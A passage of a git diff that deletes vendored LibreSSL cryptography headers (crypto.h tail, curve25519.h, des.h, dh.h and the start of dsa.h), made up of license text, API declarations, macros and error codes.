-/* unsigned long order, char *file, int line, int num_bytes, char *addr */
-typedef void *CRYPTO_MEM_LEAK_CB(unsigned long, const char *, int, int, void *);
-void CRYPTO_mem_leaks_cb(CRYPTO_MEM_LEAK_CB *cb);
-
-/* die if we have to */
-void OpenSSLDie(const char *file, int line, const char *assertion);
-#define OPENSSL_assert(e)       (void)((e) ? 0 : (OpenSSLDie(__FILE__, __LINE__, #e),1))
-
-uint64_t OPENSSL_cpu_caps(void);
-
-int OPENSSL_isservice(void);
-
-#ifndef LIBRESSL_INTERNAL
-void OPENSSL_init(void);
-
-/* CRYPTO_memcmp returns zero iff the |len| bytes at |a| and |b| are equal. It
- * takes an amount of time dependent on |len|, but independent of the contents
- * of |a| and |b|. Unlike memcmp, it cannot be used to put elements into a
- * defined order as the return value when a != b is undefined, other than to be
- * non-zero. */
-int CRYPTO_memcmp(const void *a, const void *b, size_t len);
-#endif
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_CRYPTO_strings(void);
-
-/* Error codes for the CRYPTO functions. */
-
-/* Function codes. */
-#define CRYPTO_F_CRYPTO_GET_EX_NEW_INDEX		 100
-#define CRYPTO_F_CRYPTO_GET_NEW_DYNLOCKID		 103
-#define CRYPTO_F_CRYPTO_GET_NEW_LOCKID			 101
-#define CRYPTO_F_CRYPTO_SET_EX_DATA			 102
-#define CRYPTO_F_DEF_ADD_INDEX				 104
-#define CRYPTO_F_DEF_GET_CLASS				 105
-#define CRYPTO_F_FIPS_MODE_SET				 109
-#define CRYPTO_F_INT_DUP_EX_DATA			 106
-#define CRYPTO_F_INT_FREE_EX_DATA			 107
-#define CRYPTO_F_INT_NEW_EX_DATA			 108
-
-/* Reason codes. */
-#define CRYPTO_R_FIPS_MODE_NOT_SUPPORTED		 101
-#define CRYPTO_R_NO_DYNLOCK_CREATE_CALLBACK		 100
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/curve25519.h b/thirdparty/libressl/include/openssl/curve25519.h
deleted file mode 100644
index 5aaa8c0..0000000
--- a/thirdparty/libressl/include/openssl/curve25519.h
+++ /dev/null
@@ -1,67 +0,0 @@
-/*
- * Copyright (c) 2015, Google Inc.
- *
- * Permission to use, copy, modify, and/or distribute this software for any
- * purpose with or without fee is hereby granted, provided that the above
- * copyright notice and this permission notice appear in all copies.
- *
- * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
- * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
- * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
- * SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
- * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION
- * OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
- * CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
- */
-
-#ifndef HEADER_CURVE25519_H
-#define HEADER_CURVE25519_H
-
-#include <stdint.h>
-
-#include <openssl/opensslconf.h>
-
-#if defined(__cplusplus)
-extern "C" {
-#endif
-
-/*
- * Curve25519.
- *
- * Curve25519 is an elliptic curve. See https://tools.ietf.org/html/rfc7748.
- */
-
-/*
- * X25519.
- *
- * X25519 is the Diffie-Hellman primitive built from curve25519. It is
- * sometimes referred to as curve25519, but X25519 is a more precise name.
- * See http://cr.yp.to/ecdh.html and https://tools.ietf.org/html/rfc7748.
- */
-
-#define X25519_KEY_LENGTH 32
-
-/*
- * X25519_keypair sets |out_public_value| and |out_private_key| to a freshly
- * generated, public/private key pair.
- */
-void X25519_keypair(uint8_t out_public_value[X25519_KEY_LENGTH],
-    uint8_t out_private_key[X25519_KEY_LENGTH]);
-
-/*
- * X25519 writes a shared key to |out_shared_key| that is calculated from the
- * given private key and the peer's public value. It returns one on success and
- * zero on error.
- *
- * Don't use the shared key directly, rather use a KDF and also include the two
- * public values as inputs.
- */
-int X25519(uint8_t out_shared_key[X25519_KEY_LENGTH],
-    const uint8_t private_key[X25519_KEY_LENGTH],
-    const uint8_t peers_public_value[X25519_KEY_LENGTH]);
-
-#if defined(__cplusplus)
-}  /* extern C */
-#endif
-
-#endif  /* HEADER_CURVE25519_H */
diff --git a/thirdparty/libressl/include/openssl/des.h b/thirdparty/libressl/include/openssl/des.h
deleted file mode 100644
index e1331d3..0000000
--- a/thirdparty/libressl/include/openssl/des.h
+++ /dev/null
@@ -1,219 +0,0 @@
-/* $OpenBSD: des.h,v 1.19 2015/02/07 13:19:15 doug Exp $ */
-/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_NEW_DES_H
-#define HEADER_NEW_DES_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_DES
-#error DES is disabled.
-#endif
-
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef unsigned char DES_cblock[8];
-typedef /* const */ unsigned char const_DES_cblock[8];
-/* With "const", gcc 2.8.1 on Solaris thinks that DES_cblock *
- * and const_DES_cblock * are incompatible pointer types. */
-
-typedef struct DES_ks
-    {
-    union
-	{
-	DES_cblock cblock;
-	/* make sure things are correct size on machines with
-	 * 8 byte longs */
-	DES_LONG deslong[2];
-	} ks[16];
-    } DES_key_schedule;
-
-#define DES_KEY_SZ 	(sizeof(DES_cblock))
-#define DES_SCHEDULE_SZ (sizeof(DES_key_schedule))
-
-#define DES_ENCRYPT	1
-#define DES_DECRYPT	0
-
-#define DES_CBC_MODE	0
-#define DES_PCBC_MODE	1
-
-#define DES_ecb2_encrypt(i,o,k1,k2,e) \
-	DES_ecb3_encrypt((i),(o),(k1),(k2),(k1),(e))
-
-#define DES_ede2_cbc_encrypt(i,o,l,k1,k2,iv,e) \
-	DES_ede3_cbc_encrypt((i),(o),(l),(k1),(k2),(k1),(iv),(e))
-
-#define DES_ede2_cfb64_encrypt(i,o,l,k1,k2,iv,n,e) \
-	DES_ede3_cfb64_encrypt((i),(o),(l),(k1),(k2),(k1),(iv),(n),(e))
-
-#define DES_ede2_ofb64_encrypt(i,o,l,k1,k2,iv,n) \
-	DES_ede3_ofb64_encrypt((i),(o),(l),(k1),(k2),(k1),(iv),(n))
-
-extern int DES_check_key;	/* defaults to false */
-extern int DES_rw_mode;		/* defaults to DES_PCBC_MODE */
-
-const char *DES_options(void);
-void DES_ecb3_encrypt(const_DES_cblock *input, DES_cblock *output,
-		      DES_key_schedule *ks1,DES_key_schedule *ks2,
-		      DES_key_schedule *ks3, int enc);
-DES_LONG DES_cbc_cksum(const unsigned char *input,DES_cblock *output,
-		       long length,DES_key_schedule *schedule,
-		       const_DES_cblock *ivec);
-/* DES_cbc_encrypt does not update the IV!  Use DES_ncbc_encrypt instead. */
-void DES_cbc_encrypt(const unsigned char *input,unsigned char *output,
-		     long length,DES_key_schedule *schedule,DES_cblock *ivec,
-		     int enc);
-void DES_ncbc_encrypt(const unsigned char *input,unsigned char *output,
-		      long length,DES_key_schedule *schedule,DES_cblock *ivec,
-		      int enc);
-void DES_xcbc_encrypt(const unsigned char *input,unsigned char *output,
-		      long length,DES_key_schedule *schedule,DES_cblock *ivec,
-		      const_DES_cblock *inw,const_DES_cblock *outw,int enc);
-void DES_cfb_encrypt(const unsigned char *in,unsigned char *out,int numbits,
-		     long length,DES_key_schedule *schedule,DES_cblock *ivec,
-		     int enc);
-void DES_ecb_encrypt(const_DES_cblock *input,DES_cblock *output,
-		     DES_key_schedule *ks,int enc);
-
-/* 	This is the DES encryption function that gets called by just about
-	every other DES routine in the library.  You should not use this
-	function except to implement 'modes' of DES.  I say this because the
-	functions that call this routine do the conversion from 'char *' to
-	long, and this needs to be done to make sure 'non-aligned' memory
-	access do not occur.  The characters are loaded 'little endian'.
-	Data is a pointer to 2 unsigned long's and ks is the
-	DES_key_schedule to use.  enc, is non zero specifies encryption,
-	zero if decryption. */
-void DES_encrypt1(DES_LONG *data,DES_key_schedule *ks, int enc);
-
-/* 	This functions is the same as DES_encrypt1() except that the DES
-	initial permutation (IP) and final permutation (FP) have been left
-	out.  As for DES_encrypt1(), you should not use this function.
-	It is used by the routines in the library that implement triple DES.
-	IP() DES_encrypt2() DES_encrypt2() DES_encrypt2() FP() is the same
-	as DES_encrypt1() DES_encrypt1() DES_encrypt1() except faster :-). */
-void DES_encrypt2(DES_LONG *data,DES_key_schedule *ks, int enc);
-
-void DES_encrypt3(DES_LONG *data, DES_key_schedule *ks1,
-		  DES_key_schedule *ks2, DES_key_schedule *ks3);
-void DES_decrypt3(DES_LONG *data, DES_key_schedule *ks1,
-		  DES_key_schedule *ks2, DES_key_schedule *ks3);
-void DES_ede3_cbc_encrypt(const unsigned char *input,unsigned char *output, 
-			  long length,
-			  DES_key_schedule *ks1,DES_key_schedule *ks2,
-			  DES_key_schedule *ks3,DES_cblock *ivec,int enc);
-void DES_ede3_cbcm_encrypt(const unsigned char *in,unsigned char *out,
-			   long length,
-			   DES_key_schedule *ks1,DES_key_schedule *ks2,
-			   DES_key_schedule *ks3,
-			   DES_cblock *ivec1,DES_cblock *ivec2,
-			   int enc);
-void DES_ede3_cfb64_encrypt(const unsigned char *in,unsigned char *out,
-			    long length,DES_key_schedule *ks1,
-			    DES_key_schedule *ks2,DES_key_schedule *ks3,
-			    DES_cblock *ivec,int *num,int enc);
-void DES_ede3_cfb_encrypt(const unsigned char *in,unsigned char *out,
-			  int numbits,long length,DES_key_schedule *ks1,
-			  DES_key_schedule *ks2,DES_key_schedule *ks3,
-			  DES_cblock *ivec,int enc);
-void DES_ede3_ofb64_encrypt(const unsigned char *in,unsigned char *out,
-			    long length,DES_key_schedule *ks1,
-			    DES_key_schedule *ks2,DES_key_schedule *ks3,
-			    DES_cblock *ivec,int *num);
-int DES_enc_read(int fd,void *buf,int len,DES_key_schedule *sched,
-		 DES_cblock *iv);
-int DES_enc_write(int fd,const void *buf,int len,DES_key_schedule *sched,
-		  DES_cblock *iv);
-char *DES_fcrypt(const char *buf,const char *salt, char *ret);
-char *DES_crypt(const char *buf,const char *salt);
-void DES_ofb_encrypt(const unsigned char *in,unsigned char *out,int numbits,
-		     long length,DES_key_schedule *schedule,DES_cblock *ivec);
-void DES_pcbc_encrypt(const unsigned char *input,unsigned char *output,
-		      long length,DES_key_schedule *schedule,DES_cblock *ivec,
-		      int enc);
-DES_LONG DES_quad_cksum(const unsigned char *input,DES_cblock output[],
-			long length,int out_count,DES_cblock *seed);
-int DES_random_key(DES_cblock *ret);
-void DES_set_odd_parity(DES_cblock *key);
-int DES_check_key_parity(const_DES_cblock *key);
-int DES_is_weak_key(const_DES_cblock *key);
-/* DES_set_key (= set_key = DES_key_sched = key_sched) calls
- * DES_set_key_checked if global variable DES_check_key is set,
- * DES_set_key_unchecked otherwise. */
-int DES_set_key(const_DES_cblock *key,DES_key_schedule *schedule);
-int DES_key_sched(const_DES_cblock *key,DES_key_schedule *schedule);
-int DES_set_key_checked(const_DES_cblock *key,DES_key_schedule *schedule);
-void DES_set_key_unchecked(const_DES_cblock *key,DES_key_schedule *schedule);
-void DES_string_to_key(const char *str,DES_cblock *key);
-void DES_string_to_2keys(const char *str,DES_cblock *key1,DES_cblock *key2);
-void DES_cfb64_encrypt(const unsigned char *in,unsigned char *out,long length,
-		       DES_key_schedule *schedule,DES_cblock *ivec,int *num,
-		       int enc);
-void DES_ofb64_encrypt(const unsigned char *in,unsigned char *out,long length,
-		       DES_key_schedule *schedule,DES_cblock *ivec,int *num);
-
-#define DES_fixup_key_parity DES_set_odd_parity
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/dh.h b/thirdparty/libressl/include/openssl/dh.h
deleted file mode 100644
index 920af3b..0000000
--- a/thirdparty/libressl/include/openssl/dh.h
+++ /dev/null
@@ -1,269 +0,0 @@
-/* $OpenBSD: dh.h,v 1.18 2016/11/04 18:35:30 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_DH_H
-#define HEADER_DH_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_DH
-#error DH is disabled.
-#endif
-
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-#include <openssl/ossl_typ.h>
-#ifndef OPENSSL_NO_DEPRECATED
-#include <openssl/bn.h>
-#endif
-	
-#ifndef OPENSSL_DH_MAX_MODULUS_BITS
-# define OPENSSL_DH_MAX_MODULUS_BITS	10000
-#endif
-
-#define DH_FLAG_CACHE_MONT_P     0x01
-
-/* If this flag is set the DH method is FIPS compliant and can be used
- * in FIPS mode. This is set in the validated module method. If an
- * application sets this flag in its own methods it is its reposibility
- * to ensure the result is compliant.
- */
-
-#define DH_FLAG_FIPS_METHOD			0x0400
-
-/* If this flag is set the operations normally disabled in FIPS mode are
- * permitted it is then the applications responsibility to ensure that the
- * usage is compliant.
- */
-
-#define DH_FLAG_NON_FIPS_ALLOW			0x0400
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* Already defined in ossl_typ.h */
-/* typedef struct dh_st DH; */
-/* typedef struct dh_method DH_METHOD; */
-
-struct dh_method
-	{
-	const char *name;
-	/* Methods here */
-	int (*generate_key)(DH *dh);
-	int (*compute_key)(unsigned char *key,const BIGNUM *pub_key,DH *dh);
-	int (*bn_mod_exp)(const DH *dh, BIGNUM *r, const BIGNUM *a,
-				const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
-				BN_MONT_CTX *m_ctx); /* Can be null */
-
-	int (*init)(DH *dh);
-	int (*finish)(DH *dh);
-	int flags;
-	char *app_data;
-	/* If this is non-NULL, it will be used to generate parameters */
-	int (*generate_params)(DH *dh, int prime_len, int generator, BN_GENCB *cb);
-	};
-
-struct dh_st
-	{
-	/* This first argument is used to pick up errors when
-	 * a DH is passed instead of a EVP_PKEY */
-	int pad;
-	int version;
-	BIGNUM *p;
-	BIGNUM *g;
-	long length; /* optional */
-	BIGNUM *pub_key;	/* g^x */
-	BIGNUM *priv_key;	/* x */
-
-	int flags;
-	BN_MONT_CTX *method_mont_p;
-	/* Place holders if we want to do X9.42 DH */
-	BIGNUM *q;
-	BIGNUM *j;
-	unsigned char *seed;
-	int seedlen;
-	BIGNUM *counter;
-
-	int references;
-	CRYPTO_EX_DATA ex_data;
-	const DH_METHOD *meth;
-	ENGINE *engine;
-	};
-
-#define DH_GENERATOR_2		2
-/* #define DH_GENERATOR_3	3 */
-#define DH_GENERATOR_5		5
-
-/* DH_check error codes */
-#define DH_CHECK_P_NOT_PRIME		0x01
-#define DH_CHECK_P_NOT_SAFE_PRIME	0x02
-#define DH_UNABLE_TO_CHECK_GENERATOR	0x04
-#define DH_NOT_SUITABLE_GENERATOR	0x08
-
-/* DH_check_pub_key error codes */
-#define DH_CHECK_PUBKEY_TOO_SMALL	0x01
-#define DH_CHECK_PUBKEY_TOO_LARGE	0x02
-
-/* primes p where (p-1)/2 is prime too are called "safe"; we define
-   this for backward compatibility: */
-#define DH_CHECK_P_NOT_STRONG_PRIME	DH_CHECK_P_NOT_SAFE_PRIME
-
-DH *d2i_DHparams_bio(BIO *bp, DH **a);
-int i2d_DHparams_bio(BIO *bp, DH *a);
-DH *d2i_DHparams_fp(FILE *fp, DH **a);
-int i2d_DHparams_fp(FILE *fp, DH *a);
-
-DH *DHparams_dup(DH *);
-
-const DH_METHOD *DH_OpenSSL(void);
-
-void DH_set_default_method(const DH_METHOD *meth);
-const DH_METHOD *DH_get_default_method(void);
-int DH_set_method(DH *dh, const DH_METHOD *meth);
-DH *DH_new_method(ENGINE *engine);
-
-DH *	DH_new(void);
-void	DH_free(DH *dh);
-int	DH_up_ref(DH *dh);
-int	DH_size(const DH *dh);
-int DH_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-	     CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-int DH_set_ex_data(DH *d, int idx, void *arg);
-void *DH_get_ex_data(DH *d, int idx);
-
-/* Deprecated version */
-#ifndef OPENSSL_NO_DEPRECATED
-DH *	DH_generate_parameters(int prime_len,int generator,
-		void (*callback)(int,int,void *),void *cb_arg);
-#endif /* !defined(OPENSSL_NO_DEPRECATED) */
-
-/* New version */
-int	DH_generate_parameters_ex(DH *dh, int prime_len,int generator, BN_GENCB *cb);
-
-int	DH_check(const DH *dh,int *codes);
-int	DH_check_pub_key(const DH *dh,const BIGNUM *pub_key, int *codes);
-int	DH_generate_key(DH *dh);
-int	DH_compute_key(unsigned char *key,const BIGNUM *pub_key,DH *dh);
-DH *	d2i_DHparams(DH **a,const unsigned char **pp, long length);
-int	i2d_DHparams(const DH *a,unsigned char **pp);
-int	DHparams_print_fp(FILE *fp, const DH *x);
-#ifndef OPENSSL_NO_BIO
-int	DHparams_print(BIO *bp, const DH *x);
-#else
-int	DHparams_print(char *bp, const DH *x);
-#endif
-
-#define EVP_PKEY_CTX_set_dh_paramgen_prime_len(ctx, len) \
-	EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DH, EVP_PKEY_OP_PARAMGEN, \
-			EVP_PKEY_CTRL_DH_PARAMGEN_PRIME_LEN, len, NULL)
-
-#define EVP_PKEY_CTX_set_dh_paramgen_generator(ctx, gen) \
-	EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DH, EVP_PKEY_OP_PARAMGEN, \
-			EVP_PKEY_CTRL_DH_PARAMGEN_GENERATOR, gen, NULL)
-
-#define	EVP_PKEY_CTRL_DH_PARAMGEN_PRIME_LEN	(EVP_PKEY_ALG_CTRL + 1)
-#define	EVP_PKEY_CTRL_DH_PARAMGEN_GENERATOR	(EVP_PKEY_ALG_CTRL + 2)
-		
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_DH_strings(void);
-
-/* Error codes for the DH functions. */
-
-/* Function codes. */
-#define DH_F_COMPUTE_KEY				 102
-#define DH_F_DHPARAMS_PRINT_FP				 101
-#define DH_F_DH_BUILTIN_GENPARAMS			 106
-#define DH_F_DH_COMPUTE_KEY				 114
-#define DH_F_DH_GENERATE_KEY				 115
-#define DH_F_DH_GENERATE_PARAMETERS_EX			 116
-#define DH_F_DH_NEW_METHOD				 105
-#define DH_F_DH_PARAM_DECODE				 107
-#define DH_F_DH_PRIV_DECODE				 110
-#define DH_F_DH_PRIV_ENCODE				 111
-#define DH_F_DH_PUB_DECODE				 108
-#define DH_F_DH_PUB_ENCODE				 109
-#define DH_F_DO_DH_PRINT				 100
-#define DH_F_GENERATE_KEY				 103
-#define DH_F_GENERATE_PARAMETERS			 104
-#define DH_F_PKEY_DH_DERIVE				 112
-#define DH_F_PKEY_DH_KEYGEN				 113
-
-/* Reason codes. */
-#define DH_R_BAD_GENERATOR				 101
-#define DH_R_BN_DECODE_ERROR				 109
-#define DH_R_BN_ERROR					 106
-#define DH_R_DECODE_ERROR				 104
-#define DH_R_INVALID_PUBKEY				 102
-#define DH_R_KEYS_NOT_SET				 108
-#define DH_R_KEY_SIZE_TOO_SMALL				 110
-#define DH_R_MODULUS_TOO_LARGE				 103
-#define DH_R_NON_FIPS_METHOD				 111
-#define DH_R_NO_PARAMETERS_SET				 107
-#define DH_R_NO_PRIVATE_VALUE				 100
-#define DH_R_PARAMETER_ENCODING_ERROR			 105
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/dsa.h b/thirdparty/libressl/include/openssl/dsa.h
deleted file mode 100644
index 6ddd4c3..0000000
--- a/thirdparty/libressl/include/openssl/dsa.h
+++ /dev/null
@@ -1,320 +0,0 @@
-/* $OpenBSD: dsa.h,v 1.22 2016/11/04 18:35:30 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-/*
- * The DSS routines are based on patches supplied by
- * Steven Schoch <schoch@sheba.arc.nasa.gov>.  He basically did the
- * work and I have just tweaked them a little to fit into my
- * stylistic vision for SSLeay :-) */
-
-#ifndef HEADER_DSA_H
-#define HEADER_DSA_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_DSA
-#error DSA is disabled.
-#endif
-
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-#include <openssl/crypto.h>
-#include <openssl/ossl_typ.h>
-
-#ifndef OPENSSL_NO_DEPRECATED
-#include <openssl/bn.h>
-#ifndef OPENSSL_NO_DH
-# include <openssl/dh.h>
-#endif
-#endif
-
-#ifndef OPENSSL_DSA_MAX_MODULUS_BITS
-# define OPENSSL_DSA_MAX_MODULUS_BITS	10000
-#endif
-
-#define DSA_FLAG_CACHE_MONT_P	0x01
-
-/* If this flag is set the DSA method is FIPS compliant and can be used
- * in FIPS mode. This is set in the validated module method. If an
- * application sets this flag in its own methods it is its reposibility
- * to ensure the result is compliant.
- */
-
-#define DSA_FLAG_FIPS_METHOD			0x0400
-
-/* If this flag is set the operations normally disabled in FIPS mode are
- * permitted it is then the applications responsibility to ensure that the
- * usage is compliant.
- */
-
-#define DSA_FLAG_NON_FIPS_ALLOW			0x0400
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* Already defined in ossl_typ.h */
-/* typedef struct dsa_st DSA; */
-/* typedef struct dsa_method DSA_METHOD; */
-
-typedef struct DSA_SIG_st
-	{
-	BIGNUM *r;
-	BIGNUM *s;
-	} DSA_SIG;
-
-struct dsa_method
-	{
-	const char *name;
